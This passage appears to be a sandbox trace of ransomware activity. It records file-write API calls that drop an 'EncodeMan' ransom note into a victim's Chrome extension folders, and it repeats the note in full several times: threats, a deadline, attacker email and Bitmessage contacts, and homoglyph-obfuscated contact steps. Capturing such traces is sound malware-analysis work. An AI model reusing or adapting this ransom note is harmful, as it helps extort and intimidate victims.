l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.573] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.574] CloseHandle (hObject=0x2f0) returned 1 [0286.574] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\#readme_eman#.rtf")) returned 0xffffffff [0286.574] GetLastError () returned 0x2 [0286.574] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 